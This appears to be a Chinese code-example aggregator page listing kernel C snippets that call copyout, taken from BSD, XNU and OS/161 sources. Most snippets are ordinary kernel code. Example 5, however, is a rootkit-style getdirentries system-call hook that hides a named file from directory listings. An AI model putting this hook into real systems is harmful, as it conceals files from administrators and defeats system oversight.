本文整理汇总了C++中copyout函数的典型用法代码示例。如果您正苦于以下问题:C++ copyout函数的具体用法?C++ copyout怎么用?C++ copyout使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了copyout函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的C++代码示例。
示例1: uhid_ioctl
static int
uhid_ioctl(struct usb_fifo *fifo, u_long cmd, void *addr,
int fflags)
{
struct uhid_softc *sc = usb_fifo_softc(fifo);
struct usb_gen_descriptor *ugd;
uint32_t size;
int error = 0;
uint8_t id;
switch (cmd) {
case USB_GET_REPORT_DESC:
ugd = addr;
if (sc->sc_repdesc_size > ugd->ugd_maxlen) {
size = ugd->ugd_maxlen;
} else {
size = sc->sc_repdesc_size;
}
ugd->ugd_actlen = size;
if (ugd->ugd_data == NULL)
break; /* descriptor length only */
error = copyout(sc->sc_repdesc_ptr, ugd->ugd_data, size);
break;
case USB_SET_IMMED:
if (!(fflags & FREAD)) {
error = EPERM;
break;
}
if (*(int *)addr) {
/* do a test read */
error = uhid_get_report(sc, UHID_INPUT_REPORT,
sc->sc_iid, NULL, NULL, sc->sc_isize);
if (error) {
break;
}
mtx_lock(&sc->sc_mtx);
sc->sc_flags |= UHID_FLAG_IMMED;
mtx_unlock(&sc->sc_mtx);
} else {
mtx_lock(&sc->sc_mtx);
sc->sc_flags &= ~UHID_FLAG_IMMED;
mtx_unlock(&sc->sc_mtx);
}
break;
case USB_GET_REPORT:
if (!(fflags & FREAD)) {
error = EPERM;
break;
}
ugd = addr;
switch (ugd->ugd_report_type) {
case UHID_INPUT_REPORT:
size = sc->sc_isize;
id = sc->sc_iid;
break;
case UHID_OUTPUT_REPORT:
size = sc->sc_osize;
id = sc->sc_oid;
break;
case UHID_FEATURE_REPORT:
size = sc->sc_fsize;
id = sc->sc_fid;
break;
default:
return (EINVAL);
}
if (id != 0)
copyin(ugd->ugd_data, &id, 1);
error = uhid_get_report(sc, ugd->ugd_report_type, id,
NULL, ugd->ugd_data, imin(ugd->ugd_maxlen, size));
break;
case USB_SET_REPORT:
if (!(fflags & FWRITE)) {
error = EPERM;
break;
}
ugd = addr;
switch (ugd->ugd_report_type) {
case UHID_INPUT_REPORT:
size = sc->sc_isize;
id = sc->sc_iid;
break;
case UHID_OUTPUT_REPORT:
size = sc->sc_osize;
id = sc->sc_oid;
break;
case UHID_FEATURE_REPORT:
size = sc->sc_fsize;
id = sc->sc_fid;
break;
default:
return (EINVAL);
}
if (id != 0)
copyin(ugd->ugd_data, &id, 1);
//.........这里部分代码省略.........
示例2: mach_msg_receive_results
mach_msg_return_t
mach_msg_receive_results(void)
{
thread_t self = current_thread();
ipc_space_t space = current_space();
vm_map_t map = current_map();
ipc_object_t object = self->ith_object;
mach_msg_return_t mr = self->ith_state;
mach_vm_address_t msg_addr = self->ith_msg_addr;
mach_msg_option_t option = self->ith_option;
ipc_kmsg_t kmsg = self->ith_kmsg;
mach_port_seqno_t seqno = self->ith_seqno;
mach_msg_trailer_size_t trailer_size;
io_release(object);
if (mr != MACH_MSG_SUCCESS) {
if (mr == MACH_RCV_TOO_LARGE ) {
if (option & MACH_RCV_LARGE) {
/*
* We need to inform the user-level code that it needs more
* space. The value for how much space was returned in the
* msize save area instead of the message (which was left on
* the queue).
*/
if (option & MACH_RCV_LARGE_IDENTITY) {
if (copyout((char *) &self->ith_receiver_name,
msg_addr + offsetof(mach_msg_user_header_t, msgh_local_port),
sizeof(mach_port_name_t)))
mr = MACH_RCV_INVALID_DATA;
}
if (copyout((char *) &self->ith_msize,
msg_addr + offsetof(mach_msg_user_header_t, msgh_size),
sizeof(mach_msg_size_t)))
mr = MACH_RCV_INVALID_DATA;
} else {
/* discard importance in message */
ipc_importance_clean(kmsg);
if (msg_receive_error(kmsg, msg_addr, option, seqno, space)
== MACH_RCV_INVALID_DATA)
mr = MACH_RCV_INVALID_DATA;
}
}
return mr;
}
#if IMPORTANCE_INHERITANCE
/* adopt/transform any importance attributes carried in the message */
ipc_importance_receive(kmsg, option);
#endif /* IMPORTANCE_INHERITANCE */
trailer_size = ipc_kmsg_add_trailer(kmsg, space, option, self, seqno, FALSE,
kmsg->ikm_header->msgh_remote_port->ip_context);
mr = ipc_kmsg_copyout(kmsg, space, map, MACH_MSG_BODY_NULL, option);
if (mr != MACH_MSG_SUCCESS) {
/* already received importance, so have to undo that here */
ipc_importance_unreceive(kmsg, option);
if ((mr &~ MACH_MSG_MASK) == MACH_RCV_BODY_ERROR) {
if (ipc_kmsg_put(msg_addr, kmsg, kmsg->ikm_header->msgh_size +
trailer_size) == MACH_RCV_INVALID_DATA)
mr = MACH_RCV_INVALID_DATA;
}
else {
if (msg_receive_error(kmsg, msg_addr, option, seqno, space)
== MACH_RCV_INVALID_DATA)
mr = MACH_RCV_INVALID_DATA;
}
} else {
mr = ipc_kmsg_put(msg_addr,
kmsg,
kmsg->ikm_header->msgh_size +
trailer_size);
}
return mr;
}
示例3: sendsig
void
sendsig(sig_t catcher, ksiginfo_t *ksi, sigset_t *mask)
{
struct sigframe *fp, frame;
struct sysentvec *sysent;
struct trapframe *tf;
struct sigacts *psp;
struct thread *td;
struct proc *p;
int onstack;
int code;
int sig;
td = curthread;
p = td->td_proc;
PROC_LOCK_ASSERT(p, MA_OWNED);
sig = ksi->ksi_signo;
code = ksi->ksi_code;
psp = p->p_sigacts;
mtx_assert(&psp->ps_mtx, MA_OWNED);
tf = td->td_frame;
onstack = sigonstack(tf->tf_sp);
CTR4(KTR_SIG, "sendsig: td=%p (%s) catcher=%p sig=%d", td, p->p_comm,
catcher, sig);
/* Allocate and validate space for the signal handler context. */
if ((td->td_pflags & TDP_ALTSTACK) != 0 && !onstack &&
SIGISMEMBER(psp->ps_sigonstack, sig)) {
fp = (struct sigframe *)((uintptr_t)td->td_sigstk.ss_sp +
td->td_sigstk.ss_size);
} else {
fp = (struct sigframe *)td->td_frame->tf_sp;
}
/* Make room, keeping the stack aligned */
fp--;
fp = (struct sigframe *)STACKALIGN(fp);
/* Fill in the frame to copy out */
get_mcontext(td, &frame.sf_uc.uc_mcontext, 0);
get_fpcontext(td, &frame.sf_uc.uc_mcontext);
frame.sf_si = ksi->ksi_info;
frame.sf_uc.uc_sigmask = *mask;
frame.sf_uc.uc_stack.ss_flags = (td->td_pflags & TDP_ALTSTACK) ?
((onstack) ? SS_ONSTACK : 0) : SS_DISABLE;
frame.sf_uc.uc_stack = td->td_sigstk;
mtx_unlock(&psp->ps_mtx);
PROC_UNLOCK(td->td_proc);
/* Copy the sigframe out to the user's stack. */
if (copyout(&frame, fp, sizeof(*fp)) != 0) {
/* Process has trashed its stack. Kill it. */
CTR2(KTR_SIG, "sendsig: sigexit td=%p fp=%p", td, fp);
PROC_LOCK(p);
sigexit(td, SIGILL);
}
tf->tf_a[0] = sig;
tf->tf_a[1] = (register_t)&fp->sf_si;
tf->tf_a[2] = (register_t)&fp->sf_uc;
tf->tf_sepc = (register_t)catcher;
tf->tf_sp = (register_t)fp;
sysent = p->p_sysent;
if (sysent->sv_sigcode_base != 0)
tf->tf_ra = (register_t)sysent->sv_sigcode_base;
else
tf->tf_ra = (register_t)(sysent->sv_psstrings -
*(sysent->sv_szsigcode));
CTR3(KTR_SIG, "sendsig: return td=%p pc=%#x sp=%#x", td, tf->tf_sepc,
tf->tf_sp);
PROC_LOCK(p);
mtx_lock(&psp->ps_mtx);
}
示例4: netbsd32_sendsig_siginfo
static void
netbsd32_sendsig_siginfo(const ksiginfo_t *ksi, const sigset_t *mask)
{
struct lwp *l = curlwp;
struct proc *p = l->l_proc;
struct sigacts *ps = p->p_sigacts;
int onstack;
int sig = ksi->ksi_signo;
ucontext32_t uc;
struct sparc32_sigframe_siginfo *fp;
netbsd32_intptr_t catcher;
struct trapframe64 *tf = l->l_md.md_tf;
struct rwindow32 *oldsp, *newsp;
int ucsz, error;
/* Need to attempt to zero extend this 32-bit pointer */
oldsp = (struct rwindow32*)(u_long)(u_int)tf->tf_out[6];
/* Do we need to jump onto the signal stack? */
onstack =
(l->l_sigstk.ss_flags & (SS_DISABLE | SS_ONSTACK)) == 0 &&
(SIGACTION(p, sig).sa_flags & SA_ONSTACK) != 0;
/* Allocate space for the signal handler context. */
if (onstack)
fp = (struct sparc32_sigframe_siginfo *)
((char *)l->l_sigstk.ss_sp +
l->l_sigstk.ss_size);
else
fp = (struct sparc32_sigframe_siginfo *)oldsp;
fp = (struct sparc32_sigframe_siginfo*)((u_long)(fp - 1) & ~7);
/*
* Build the signal context to be used by sigreturn.
*/
uc.uc_flags = _UC_SIGMASK |
((l->l_sigstk.ss_flags & SS_ONSTACK)
? _UC_SETSTACK : _UC_CLRSTACK);
uc.uc_sigmask = *mask;
uc.uc_link = (uint32_t)(uintptr_t)l->l_ctxlink;
memset(&uc.uc_stack, 0, sizeof(uc.uc_stack));
sendsig_reset(l, sig);
/*
* Now copy the stack contents out to user space.
* We need to make sure that when we start the signal handler,
* its %i6 (%fp), which is loaded from the newly allocated stack area,
* joins seamlessly with the frame it was in when the signal occurred,
* so that the debugger and _longjmp code can back up through it.
* Since we're calling the handler directly, allocate a full size
* C stack frame.
*/
mutex_exit(p->p_lock);
cpu_getmcontext32(l, &uc.uc_mcontext, &uc.uc_flags);
ucsz = (int)(intptr_t)&uc.__uc_pad - (int)(intptr_t)&uc;
newsp = (struct rwindow32*)((intptr_t)fp - sizeof(struct frame32));
error = (copyout(&ksi->ksi_info, &fp->sf_si, sizeof ksi->ksi_info) ||
copyout(&uc, &fp->sf_uc, ucsz) ||
suword(&newsp->rw_in[6], (intptr_t)oldsp));
mutex_enter(p->p_lock);
if (error) {
/*
* Process has trashed its stack; give it an illegal
* instruction to halt it in its tracks.
*/
sigexit(l, SIGILL);
/* NOTREACHED */
}
switch (ps->sa_sigdesc[sig].sd_vers) {
default:
/* Unsupported trampoline version; kill the process. */
sigexit(l, SIGILL);
case 2:
/*
* Arrange to continue execution at the user's handler.
* It needs a new stack pointer, a return address and
* three arguments: (signo, siginfo *, ucontext *).
*/
catcher = (intptr_t)SIGACTION(p, sig).sa_handler;
tf->tf_pc = catcher;
tf->tf_npc = catcher + 4;
tf->tf_out[0] = sig;
tf->tf_out[1] = (intptr_t)&fp->sf_si;
tf->tf_out[2] = (intptr_t)&fp->sf_uc;
tf->tf_out[6] = (intptr_t)newsp;
tf->tf_out[7] = (intptr_t)ps->sa_sigdesc[sig].sd_tramp - 8;
break;
}
/* Remember that we're now on the signal stack. */
if (onstack)
l->l_sigstk.ss_flags |= SS_ONSTACK;
}
示例5: getdirentries_hook
/*
* getdirentries system call hook.
* Hides the file T_NAME.
*/
static int
getdirentries_hook(struct thread *td, void *syscall_args)
{
struct getdirentries_args /* {
int fd;
char *buf;
u_int count;
long *basep;
} */ *uap;
uap = (struct getdirentries_args *)syscall_args;
struct dirent *dp, *current;
unsigned int size, count;
/*
* Store the directory entries found in fd in buf, and record the
* number of bytes actually transferred.
*/
getdirentries(td, syscall_args);
size = td->td_retval[0];
/* Does fd actually contain any directory entries? */
if (size > 0) {
MALLOC(dp, struct dirent *, size, M_TEMP, M_NOWAIT);
copyin(uap->buf, dp, size);
current = dp;
count = size;
/*
* Iterate through the directory entries found in fd.
* Note: The last directory entry always has a record length
* of zero.
*/
while ((current->d_reclen != 0) && (count > 0)) {
count -= current->d_reclen;
/* Do we want to hide this file? */
if(strcmp((char *)&(current->d_name), T_NAME) == 0)
{
/*
* Copy every directory entry found after
* T_NAME over T_NAME, effectively cutting it
* out.
*/
if (count != 0)
bcopy((char *)current +
current->d_reclen, current,
count);
size -= current->d_reclen;
break;
}
/*
* Are there still more directory entries to
* look through?
*/
if (count != 0)
/* Advance to the next record. */
current = (struct dirent *)((char *)current +
current->d_reclen);
}
/*
* If T_NAME was found in fd, adjust the "return values" to
* hide it. If T_NAME wasn't found...don't worry 'bout it.
*/
td->td_retval[0] = size;
copyout(dp, uap->buf, size);
FREE(dp, M_TEMP);
}
return(0);
}
示例6: statis_upd
int
statis_upd(caddr_t adr)
{
(void) copyout(statis, adr, sizeof (struct statis) * sind);
return (sind);
}
示例7: load_coff_section
static int
load_coff_section(struct vmspace *vmspace, struct vnode *vp, vm_offset_t offset,
caddr_t vmaddr, size_t memsz, size_t filsz, vm_prot_t prot)
{
size_t map_len;
vm_offset_t map_offset;
vm_offset_t map_addr;
int error;
unsigned char *data_buf = 0;
size_t copy_len;
map_offset = trunc_page(offset);
map_addr = trunc_page((vm_offset_t)vmaddr);
if (memsz > filsz) {
/*
* We have the stupid situation that
* the section is longer than it is on file,
* which means it has zero-filled areas, and
* we have to work for it. Stupid iBCS!
*/
map_len = trunc_page(offset + filsz) - trunc_page(map_offset);
} else {
/*
* The only stuff we care about is on disk, and we
* don't care if we map in more than is really there.
*/
map_len = round_page(offset + filsz) - trunc_page(map_offset);
}
DPRINTF(("%s(%d): vm_mmap(&vmspace->vm_map, &0x%08jx, 0x%x, 0x%x, "
"VM_PROT_ALL, MAP_PRIVATE | MAP_FIXED, OBJT_VNODE, vp, 0x%x)\n",
__FILE__, __LINE__, (uintmax_t)map_addr, map_len, prot,
map_offset));
if ((error = vm_mmap(&vmspace->vm_map,
&map_addr,
map_len,
prot,
VM_PROT_ALL,
MAP_PRIVATE | MAP_FIXED,
OBJT_VNODE,
vp,
map_offset)) != 0)
return error;
if (memsz == filsz) {
/* We're done! */
return 0;
}
/*
* Now we have screwball stuff, to accomodate stupid COFF.
* We have to map the remaining bit of the file into the kernel's
* memory map, allocate some anonymous memory, copy that last
* bit into it, and then we're done. *sigh*
* For clean-up reasons, we actally map in the file last.
*/
copy_len = (offset + filsz) - trunc_page(offset + filsz);
map_addr = trunc_page((vm_offset_t)vmaddr + filsz);
map_len = round_page((vm_offset_t)vmaddr + memsz) - map_addr;
DPRINTF(("%s(%d): vm_map_find(&vmspace->vm_map, NULL, 0, &0x%08jx,0x%x, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0)\n", __FILE__, __LINE__, (uintmax_t)map_addr, map_len));
if (map_len != 0) {
error = vm_map_find(&vmspace->vm_map, NULL, 0, &map_addr,
map_len, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0);
if (error)
return (vm_mmap_to_errno(error));
}
if ((error = vm_mmap(exec_map,
(vm_offset_t *) &data_buf,
PAGE_SIZE,
VM_PROT_READ,
VM_PROT_READ,
0,
OBJT_VNODE,
vp,
trunc_page(offset + filsz))) != 0)
return error;
error = copyout(data_buf, (caddr_t) map_addr, copy_len);
if (vm_map_remove(exec_map,
(vm_offset_t) data_buf,
(vm_offset_t) data_buf + PAGE_SIZE))
panic("load_coff_section vm_map_remove failed");
return error;
}
示例8: tws_passthru
static int
tws_passthru(struct tws_softc *sc, void *buf)
{
struct tws_request *req;
struct tws_ioctl_no_data_buf *ubuf = (struct tws_ioctl_no_data_buf *)buf;
int error;
u_int16_t lun4;
if ( tws_get_state(sc) == TWS_RESET ) {
return(EBUSY);
}
do {
req = tws_get_request(sc, TWS_PASSTHRU_REQ);
if ( !req ) {
sc->chan = 1;
error = tsleep((void *)&sc->chan, 0,
"tws_sleep", TWS_IO_TIMEOUT*hz);
if ( error == EWOULDBLOCK ) {
return(ETIMEDOUT);
}
} else {
break;
}
}while(1);
req->length = ubuf->driver_pkt.buffer_length;
TWS_TRACE_DEBUG(sc, "datal,rid", req->length, req->request_id);
if ( req->length ) {
req->data = kmalloc(req->length, M_TWS, M_WAITOK | M_ZERO);
error = copyin(ubuf->pdata, req->data, req->length);
}
req->flags = TWS_DIR_IN | TWS_DIR_OUT;
req->cb = tws_passthru_complete;
memcpy(&req->cmd_pkt->cmd, &ubuf->cmd_pkt.cmd,
sizeof(struct tws_command_apache));
if ( GET_OPCODE(req->cmd_pkt->cmd.pkt_a.res__opcode) ==
TWS_FW_CMD_EXECUTE_SCSI ) {
lun4 = req->cmd_pkt->cmd.pkt_a.lun_l4__req_id & 0xF000;
req->cmd_pkt->cmd.pkt_a.lun_l4__req_id = lun4 | req->request_id;
} else {
req->cmd_pkt->cmd.pkt_g.generic.request_id = (u_int8_t) req->request_id;
}
lockmgr(&sc->gen_lock, LK_EXCLUSIVE);
req->error_code = tws_map_request(sc, req);
error = lksleep(req, &sc->gen_lock, 0, "tws_passthru", TWS_IO_TIMEOUT*hz);
if ( error == EWOULDBLOCK ) {
error = ETIMEDOUT;
TWS_TRACE_DEBUG(sc, "lksleep timeout", error, req->request_id);
tws_reset((void *)sc);
}
if ( req->error_code == TWS_REQ_REQUEUE ) {
error = EBUSY;
}
tws_unmap_request(sc, req);
memcpy(&ubuf->cmd_pkt.hdr, &req->cmd_pkt->hdr, sizeof(struct tws_command_apache));
memcpy(&ubuf->cmd_pkt.cmd, &req->cmd_pkt->cmd, sizeof(struct tws_command_apache));
if ( !error && req->length ) {
error = copyout(req->data, ubuf->pdata, req->length);
}
kfree(req->data, M_TWS);
req->state = TWS_REQ_STATE_FREE;
lockmgr(&sc->gen_lock, LK_RELEASE);
if ( error )
TWS_TRACE_DEBUG(sc, "errored", error, 0);
if ( req->error_code != TWS_REQ_SUBMIT_SUCCESS )
ubuf->driver_pkt.os_status = error;
if ( sc->chan && tws_get_state(sc) != TWS_RESET ) {
sc->chan = 0;
wakeup((void *)&sc->chan);
}
return(error);
}
示例9: linux_ptrace
int
linux_ptrace(struct thread *td, struct linux_ptrace_args *uap)
{
union {
struct linux_pt_reg reg;
struct linux_pt_fpreg fpreg;
struct linux_pt_fpxreg fpxreg;
} r;
union {
struct reg bsd_reg;
struct fpreg bsd_fpreg;
struct dbreg bsd_dbreg;
} u;
void *addr;
pid_t pid;
int error, req;
error = 0;
/* by default, just copy data intact */
req = uap->req;
pid = (pid_t)uap->pid;
addr = (void *)uap->addr;
switch (req) {
case PTRACE_TRACEME:
case PTRACE_POKETEXT:
case PTRACE_POKEDATA:
case PTRACE_KILL:
error = kern_ptrace(td, req, pid, addr, uap->data);
break;
case PTRACE_PEEKTEXT:
case PTRACE_PEEKDATA: {
/* need to preserve return value */
int rval = td->td_retval[0];
error = kern_ptrace(td, req, pid, addr, 0);
if (error == 0)
error = copyout(td->td_retval, (void *)uap->data,
sizeof(l_int));
td->td_retval[0] = rval;
break;
}
case PTRACE_DETACH:
error = kern_ptrace(td, PT_DETACH, pid, (void *)1,
map_signum(uap->data));
break;
case PTRACE_SINGLESTEP:
case PTRACE_CONT:
error = kern_ptrace(td, req, pid, (void *)1,
map_signum(uap->data));
break;
case PTRACE_ATTACH:
error = kern_ptrace(td, PT_ATTACH, pid, addr, uap->data);
break;
case PTRACE_GETREGS:
/* Linux is using data where FreeBSD is using addr */
error = kern_ptrace(td, PT_GETREGS, pid, &u.bsd_reg, 0);
if (error == 0) {
map_regs_to_linux(&u.bsd_reg, &r.reg);
error = copyout(&r.reg, (void *)uap->data,
sizeof(r.reg));
}
break;
case PTRACE_SETREGS:
/* Linux is using data where FreeBSD is using addr */
error = copyin((void *)uap->data, &r.reg, sizeof(r.reg));
if (error == 0) {
map_regs_from_linux(&u.bsd_reg, &r.reg);
error = kern_ptrace(td, PT_SETREGS, pid, &u.bsd_reg, 0);
}
break;
case PTRACE_GETFPREGS:
/* Linux is using data where FreeBSD is using addr */
error = kern_ptrace(td, PT_GETFPREGS, pid, &u.bsd_fpreg, 0);
if (error == 0) {
map_fpregs_to_linux(&u.bsd_fpreg, &r.fpreg);
error = copyout(&r.fpreg, (void *)uap->data,
sizeof(r.fpreg));
}
break;
case PTRACE_SETFPREGS:
/* Linux is using data where FreeBSD is using addr */
error = copyin((void *)uap->data, &r.fpreg, sizeof(r.fpreg));
if (error == 0) {
map_fpregs_from_linux(&u.bsd_fpreg, &r.fpreg);
error = kern_ptrace(td, PT_SETFPREGS, pid,
&u.bsd_fpreg, 0);
}
break;
case PTRACE_SETFPXREGS:
error = copyin((void *)uap->data, &r.fpxreg, sizeof(r.fpxreg));
if (error)
break;
/* FALL THROUGH */
case PTRACE_GETFPXREGS: {
struct proc *p;
struct thread *td2;
if (sizeof(struct linux_pt_fpxreg) != sizeof(struct savexmm)) {
static int once = 0;
//.........这里部分代码省略.........
示例10: anp_ioctl
//.........这里部分代码省略.........
}
#endif
/*
* Interpret high order word to find amount of data to be
* copied to/from the user's address space.
*/
size = IOCPARM_LEN(com);
if (size > IOCPARM_MAX) {
anp_errno=ENOTTY;
MU_UNLOCK(kern_lock_p);
return -1;
}
memp = NULL;
if (size > sizeof (stkbuf)) {
memp = (caddr_t)anp_sys_malloc((u_long)size, M_IOCTLOPS, M_WAITOK);
data = memp;
} else
data = stkbuf;
if (com&IOC_IN) {
if (size) {
error = copyin(udata, data, (u_int)size);
if (error) {
if (memp)
anp_sys_free(memp, M_IOCTLOPS);
anp_errno=error;
MU_UNLOCK(kern_lock_p);
return -1;
}
} else
*(caddr_t *)data = udata;
} else if ((com&IOC_OUT) && size)
/*
* Zero the buffer so the user always
* gets back something deterministic.
*/
bzero(data, size);
else if (com&IOC_VOID)
*(caddr_t *)data = udata;
switch (com) {
case FIONBIO:
case FIOASYNC:
tmp = *((int *) data);
error = (soo_ioctl)(sock, com, (caddr_t)&tmp);
break;
#ifdef NOPE
case FIOSETOWN:
tmp = *((int *)data);
if (fp->f_type == DTYPE_SOCKET) {
((struct socket *)fp->f_data)->so_pgid = tmp;
error = 0;
break;
}
if (tmp <= 0) {
tmp = -tmp;
} else {
struct proc *p1 = pfind(tmp);
if (p1 == 0) {
error = ESRCH;
break;
}
tmp = p1->p_pgrp->pg_id;
}
error = (*fp->f_ops->fo_ioctl)
(fp, (int)TIOCSPGRP, (caddr_t)&tmp, p);
break;
case FIOGETOWN:
if (fp->f_type == DTYPE_SOCKET) {
error = 0;
*(int *)data = ((struct socket *)fp->f_data)->so_pgid;
break;
}
error = (*fp->f_ops->fo_ioctl)(fp, (int)TIOCGPGRP, data, p);
*(int *)data = -*(int *)data;
break;
#endif
default:
error = soo_ioctl(sock, com, data);
/*
* Copy any data to user, size was
* already set and checked above.
*/
if (error == 0 && (com&IOC_OUT) && size)
error = copyout(data, udata, (u_int)size);
break;
}
if (memp)
anp_sys_free(memp, M_IOCTLOPS);
anp_errno=error;
MU_UNLOCK(kern_lock_p);
if (anp_errno!=0) {
return -1;
} else {
return 0;
}
}
示例11: uiomove
int
uiomove(void *ptr, size_t n, struct uio *uio)
{
struct iovec *iov;
size_t size;
int result;
if (uio->uio_rw != UIO_READ && uio->uio_rw != UIO_WRITE) {
panic("uiomove: Invalid uio_rw %d\n", (int) uio->uio_rw);
}
if (uio->uio_segflg==UIO_SYSSPACE) {
KASSERT(uio->uio_space == NULL);
}
else {
KASSERT(uio->uio_space == curthread->t_addrspace);
}
while (n > 0 && uio->uio_resid > 0) {
/* get the first iovec */
iov = uio->uio_iov;
size = iov->iov_len;
if (size > n) {
size = n;
}
if (size == 0) {
/* move to the next iovec and try again */
uio->uio_iov++;
uio->uio_iovcnt--;
if (uio->uio_iovcnt == 0) {
/*
* This should only happen if you set
* uio_resid incorrectly (to more than
* the total length of buffers the uio
* points to).
*/
panic("uiomove: ran out of buffers\n");
}
continue;
}
switch (uio->uio_segflg) {
case UIO_SYSSPACE:
result = 0;
if (uio->uio_rw == UIO_READ) {
memmove(iov->iov_kbase, ptr, size);
}
else {
memmove(ptr, iov->iov_kbase, size);
}
iov->iov_kbase = ((char *)iov->iov_kbase+size);
break;
case UIO_USERSPACE:
case UIO_USERISPACE:
if (uio->uio_rw == UIO_READ) {
result = copyout(ptr, iov->iov_ubase,size);
}
else {
result = copyin(iov->iov_ubase, ptr, size);
}
if (result) {
return result;
}
iov->iov_ubase += size;
break;
default:
panic("uiomove: Invalid uio_segflg %d\n",
(int)uio->uio_segflg);
}
iov->iov_len -= size;
uio->uio_resid -= size;
uio->uio_offset += size;
ptr = ((char *)ptr + size);
n -= size;
}
return 0;
}
示例12: sys_fcntl
/*
* The file control system call.
*/
int
sys_fcntl(struct lwp *l, const struct sys_fcntl_args *uap, register_t *retval)
{
/* {
syscallarg(int) fd;
syscallarg(int) cmd;
syscallarg(void *) arg;
} */
int fd, i, tmp, error, cmd, newmin;
filedesc_t *fdp;
file_t *fp;
struct flock fl;
bool cloexec = false;
fd = SCARG(uap, fd);
cmd = SCARG(uap, cmd);
fdp = l->l_fd;
error = 0;
switch (cmd) {
case F_CLOSEM:
if (fd < 0)
return EBADF;
while ((i = fdp->fd_lastfile) >= fd) {
if (fd_getfile(i) == NULL) {
/* Another thread has updated. */
continue;
}
fd_close(i);
}
return 0;
case F_MAXFD:
*retval = fdp->fd_lastfile;
return 0;
case F_SETLKW:
case F_SETLK:
case F_GETLK:
error = copyin(SCARG(uap, arg), &fl, sizeof(fl));
if (error)
return error;
error = do_fcntl_lock(fd, cmd, &fl);
if (cmd == F_GETLK && error == 0)
error = copyout(&fl, SCARG(uap, arg), sizeof(fl));
return error;
default:
/* Handled below */
break;
}
if ((fp = fd_getfile(fd)) == NULL)
return (EBADF);
if ((cmd & F_FSCTL)) {
error = fcntl_forfs(fd, fp, cmd, SCARG(uap, arg));
fd_putfile(fd);
return error;
}
switch (cmd) {
case F_DUPFD_CLOEXEC:
cloexec = true;
/*FALLTHROUGH*/
case F_DUPFD:
newmin = (long)SCARG(uap, arg);
if ((u_int)newmin >=
l->l_proc->p_rlimit[RLIMIT_NOFILE].rlim_cur ||
(u_int)newmin >= maxfiles) {
fd_putfile(fd);
return EINVAL;
}
error = fd_dup(fp, newmin, &i, cloexec);
*retval = i;
break;
case F_GETFD:
*retval = fdp->fd_dt->dt_ff[fd]->ff_exclose;
break;
case F_SETFD:
fd_set_exclose(l, fd,
((long)SCARG(uap, arg) & FD_CLOEXEC) != 0);
break;
case F_GETNOSIGPIPE:
*retval = (fp->f_flag & FNOSIGPIPE) != 0;
break;
case F_SETNOSIGPIPE:
if (SCARG(uap, arg))
atomic_or_uint(&fp->f_flag, FNOSIGPIPE);
else
atomic_and_uint(&fp->f_flag, ~FNOSIGPIPE);
*retval = 0;
break;
//.........这里部分代码省略.........
示例13: compat_43_sys_getdirentries
//.........这里部分代码省略.........
VOP_UNLOCK(vp);
if (error)
goto out1;
loff = fp->f_offset;
nbytes = SCARG(uap, count);
buflen = min(MAXBSIZE, nbytes);
if (buflen < va.va_blocksize)
buflen = va.va_blocksize;
tbuf = malloc(buflen, M_TEMP, M_WAITOK);
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
off = fp->f_offset;
again:
aiov.iov_base = tbuf;
aiov.iov_len = buflen;
auio.uio_iov = &aiov;
auio.uio_iovcnt = 1;
auio.uio_rw = UIO_READ;
auio.uio_resid = buflen;
auio.uio_offset = off;
UIO_SETUP_SYSSPACE(&auio);
/*
* First we read into the malloc'ed buffer, then
* we massage it into user space, one record at a time.
*/
error = VOP_READDIR(vp, &auio, fp->f_cred, &eofflag, &cookiebuf,
&ncookies);
if (error)
goto out;
inp = (char *)tbuf;
outp = SCARG(uap, buf);
resid = nbytes;
if ((len = buflen - auio.uio_resid) == 0)
goto eof;
for (cookie = cookiebuf; len > 0; len -= reclen) {
bdp = (struct dirent *)inp;
reclen = bdp->d_reclen;
if (reclen & 3)
panic(__func__);
if (bdp->d_fileno == 0) {
inp += reclen; /* it is a hole; squish it out */
if (cookie)
off = *cookie++;
else
off += reclen;
continue;
}
old_reclen = _DIRENT_RECLEN(&idb, bdp->d_namlen);
if (reclen > len || resid < old_reclen) {
/* entry too big for buffer, so just stop */
outp++;
break;
}
/*
* Massage in place to make a Dirent12-shaped dirent (otherwise
* we have to worry about touching user memory outside of
* the copyout() call).
*/
idb.d_fileno = (uint32_t)bdp->d_fileno;
idb.d_reclen = (uint16_t)old_reclen;
idb.d_namlen = (uint16_t)bdp->d_namlen;
strcpy(idb.d_name, bdp->d_name);
if ((error = copyout(&idb, outp, old_reclen)))
goto out;
/* advance past this real entry */
inp += reclen;
if (cookie)
off = *cookie++; /* each entry points to itself */
else
off += reclen;
/* advance output past Dirent12-shaped entry */
outp += old_reclen;
resid -= old_reclen;
}
/* if we squished out the whole block, try again */
if (outp == SCARG(uap, buf)) {
if (cookiebuf)
free(cookiebuf, M_TEMP);
cookiebuf = NULL;
goto again;
}
fp->f_offset = off; /* update the vnode offset */
eof:
*retval = nbytes - resid;
out:
VOP_UNLOCK(vp);
if (cookiebuf)
free(cookiebuf, M_TEMP);
free(tbuf, M_TEMP);
out1:
fd_putfile(SCARG(uap, fd));
if (error)
return error;
return copyout(&loff, SCARG(uap, basep), sizeof(long));
}
示例14: compat_43_sys_lstat
/* ARGSUSED */
int
compat_43_sys_lstat(struct lwp *l, const struct compat_43_sys_lstat_args *uap, register_t *retval)
{
/* {
syscallarg(char *) path;
syscallarg(struct ostat *) ub;
} */
struct vnode *vp, *dvp;
struct stat sb, sb1;
struct stat43 osb;
int error;
struct pathbuf *pb;
struct nameidata nd;
int ndflags;
error = pathbuf_copyin(SCARG(uap, path), &pb);
if (error) {
return error;
}
ndflags = NOFOLLOW | LOCKLEAF | LOCKPARENT | TRYEMULROOT;
again:
NDINIT(&nd, LOOKUP, ndflags, pb);
if ((error = namei(&nd))) {
if (error == EISDIR && (ndflags & LOCKPARENT) != 0) {
/*
* Should only happen on '/'. Retry without LOCKPARENT;
* this is safe since the vnode won't be a VLNK.
*/
ndflags &= ~LOCKPARENT;
goto again;
}
pathbuf_destroy(pb);
return (error);
}
/*
* For symbolic links, always return the attributes of its
* containing directory, except for mode, size, and links.
*/
vp = nd.ni_vp;
dvp = nd.ni_dvp;
pathbuf_destroy(pb);
if (vp->v_type != VLNK) {
if ((ndflags & LOCKPARENT) != 0) {
if (dvp == vp)
